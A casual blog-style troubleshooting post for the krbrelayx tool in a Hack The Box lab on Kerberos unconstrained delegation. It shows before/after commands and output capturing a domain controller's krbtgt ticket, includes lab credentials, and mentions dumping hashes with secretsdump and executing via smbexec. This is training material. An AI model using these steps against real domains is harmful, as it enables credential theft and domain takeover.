sup nerds here is a compilation of the problems you might have with krbxrelay and how I fixed them (take them with a grain of salt I’m really not that smart)
This is what worked for me when I was doing Unconstrained Delegation – Users in Kerberos Attacks on htb
You didn’t put ur junk in /etc/hosts correct
Remember that it goes <IP><DOMAIN><HOSTNAME>
<IP><DOMAIN><HOSTNAME>
<10.129.205.35><inlanefreight.local><dc01.inlanefreight.local>
hash the password because that fixes it sometimes
https://codebeautify.org/ntlm-hash-generator
go on that link and make it into a hash ok
before
sudo python krbrelayx.py -p "C@lluMDIXON"
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.205.35
[-] Could not find the correct encryption key! Ticket is encrypted with keytype 23, but keytype(s) were supplied
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
after
sudo python krbrelayx.py -hashes :3E7C48255206470A13543B27B7AF18DE
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.205.35
[*] Got ticket for DC01$@INLANEFREIGHT.LOCAL [krbtgt@INLANEFREIGHT.LOCAL]
[*] Saving ticket in DC01$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
Hope this helps!!1 make sure to double check ur syntax when ur doin stuff ok byeeeeeeee 🙂
callum.dixon:C@lluMDIXON has Unconstrained Delegation set and carole.rose:jasmine has genericwrite over callum.dixon. Using this information, try to compromise the domain and read the content of C:\flag.txt on DC01.
I just used smbexec with the admin hashes after dumping it with secretsdump but you do you lol
Leave a Reply